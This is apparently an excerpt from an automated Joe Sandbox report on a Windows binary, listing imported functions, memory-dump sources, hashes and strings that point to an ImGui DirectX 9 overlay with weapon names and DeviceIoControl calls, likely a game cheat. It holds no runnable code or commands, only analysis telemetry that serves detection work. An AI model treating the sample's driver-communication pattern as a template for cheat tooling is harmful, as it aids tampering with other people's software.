                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3700
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3712
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3722
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3734
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3744
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3756
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3766
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF68B4B3779
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3789
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF68B4B379C
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B37AC
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B37BE
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B37CE
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B37E0
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B37F0
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3802
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3812
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3824
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3834
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF68B4B3845
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3855
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3867
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3877
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7C40: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CA0
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7C40: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CC2
                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4B38A5
                                                                                                                                                                                                      • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B38E3
                                                                                                                                                                                                      • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B38ED
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 764698701-0
                                                                                                                                                                                                      • Opcode ID: a8ad4a536fd2be781a0b7dfde1e13426297cc7de96d2636cbf9a6cd93bfd7741
                                                                                                                                                                                                      • Instruction ID: 1b48bb3994e24ad8cdab4213265fcf56bc1145b797f5724f1ba656cce3b21c30
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8ad4a536fd2be781a0b7dfde1e13426297cc7de96d2636cbf9a6cd93bfd7741
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40E1D660A5EA8BD2EE409B21E8A64792761FF89F45F445039E85E9727ADF3CF10DC700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140 ref: 00007FF68B4B39B0
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A00
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A12
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A24
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A36
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A48
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A5A
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A6C
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3A7E
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3A90
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AA2
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3AB4
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AC6
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AD8
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AEA
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3AFC
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B0E
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B20
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B32
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B44
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B56
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B68
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B7A
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3B8C
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF68B4B3B9E
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF68B4B3BB0
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BC2
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BD4
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BE6
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3BF8
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF68B4B3C0A
                                                                                                                                                                                                      • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF68B4B3C1C
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7C40: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CA0
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7C40: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF68B4C74EA,?,?,?,00007FF68B4C7994), ref: 00007FF68B4C7CC2
                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4B3C4A
                                                                                                                                                                                                      • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B3C81
                                                                                                                                                                                                      • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF68B4B3C8B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1635463032-0
                                                                                                                                                                                                      • Opcode ID: bfffe3d76a1daa96140dedc425c75a0fe6ff2fed2e86e3c0fccdb18951e11754
                                                                                                                                                                                                      • Instruction ID: 6a5dbd6e91574bb8075d7d6f8774fe96b4d09268c371538542a5a72c8cb08d11
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfffe3d76a1daa96140dedc425c75a0fe6ff2fed2e86e3c0fccdb18951e11754
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E91F761A28A47D2EF50DF14E8A55A96320FF88F49F84503AE64E87579DF3CE64EC700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free$__acrt_iob_funcfclose
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3697265371-0
                                                                                                                                                                                                      • Opcode ID: b7338433da687256703d9c3e595e8385020f2be4f58e2c06e59224cc98ad95c9
                                                                                                                                                                                                      • Instruction ID: a7c4273a708f4d795463ee8bd56fc27f5388dd5398c098fa0f31ba5a48bcaf13
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7338433da687256703d9c3e595e8385020f2be4f58e2c06e59224cc98ad95c9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70E11835B4AB81D6EB998F60E5911B873A4FF49B40F4D0439CA6D83365EF38B860C351
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                      • Opcode ID: 3d0d18b2d32f5ae7161202d7a3404b7747ab63f17aa8484d7db5cdba834a80bb
                                                                                                                                                                                                      • Instruction ID: a068df2bc2883612b9d2fbd783d6b4bc2d10039e4f8acd281dc01930547c7d55
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d0d18b2d32f5ae7161202d7a3404b7747ab63f17aa8484d7db5cdba834a80bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDB1F631A4AA82D5FF558F61D5956B822A0FF4AF40F0D543DC90EC72BAEF2DA904C714
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fclose$fseekmalloc$freadfreeftell
                                                                                                                                                                                                      • String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
                                                                                                                                                                                                      • API String ID: 3453272378-2114150515
                                                                                                                                                                                                      • Opcode ID: 5a6492871942f2b9e1f9e70ea6d63c79368bfc33f609ff677ac7cdf6cb9ad1f0
                                                                                                                                                                                                      • Instruction ID: 9e0e316adf626fd516aecf5663f1c92502c628fa8afec45fe337cb8afdd9f5bd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a6492871942f2b9e1f9e70ea6d63c79368bfc33f609ff677ac7cdf6cb9ad1f0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17917421908BC5C5F7128F69A8022F9B3B0FF9D759F046225EE8953678EF39E146CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
                                                                                                                                                                                                      • String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
                                                                                                                                                                                                      • API String ID: 2444153533-2332507762
                                                                                                                                                                                                      • Opcode ID: 48d9da6e33a340731aa1b5686689c15005319b8bc144aa1fc55e66777013b573
                                                                                                                                                                                                      • Instruction ID: 2578349bbb25b827a5bc67212a6c85177ca81d10a1e80eeb51a06778d83cc89f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48d9da6e33a340731aa1b5686689c15005319b8bc144aa1fc55e66777013b573
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DD15572A08B81CAE3218F25E8453A977B4FF58308F184128DB9C8767ADF7DE065CB01
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memchr$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID: Rifl$Shotgun$Snip
                                                                                                                                                                                                      • API String ID: 876120417-932107277
                                                                                                                                                                                                      • Opcode ID: cd5e2e956bac97ee5d3d5cf67882bcc3ffbb7adab8e323f04e5c1a482701df14
                                                                                                                                                                                                      • Instruction ID: a5fc7bcad0cb673b7530d124bef69b6df8810c7c0019da5f1587b4966cc4a6b6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd5e2e956bac97ee5d3d5cf67882bcc3ffbb7adab8e323f04e5c1a482701df14
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B451A321A18A41C6FA548FA5D4062BD6390FF4CBA0F944239D76D837E9DF7CE54AC701
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C8050: DeviceIoControl.KERNEL32 ref: 00007FF68B4C8109
                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF68B4B2963
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B28B1
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2ACC
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2B0D
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2B5E
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2B9E
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2BFA
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2C77
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B2CC3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememcpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2471032920-0
                                                                                                                                                                                                      • Opcode ID: 19efa608a734ef2fc86b6138f28007579d95ebd76c5cc6b832ee4b01f031bf47
                                                                                                                                                                                                      • Instruction ID: 20820ea6ec383d51f0d025adc202fb5a9105d5771b7cecb1e06a3f9718fa2063
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19efa608a734ef2fc86b6138f28007579d95ebd76c5cc6b832ee4b01f031bf47
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76E1CE62F14A42C5FB00DBA8D4523AD2761FF49BA4F40563ADA6D97AEDDF78E084C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
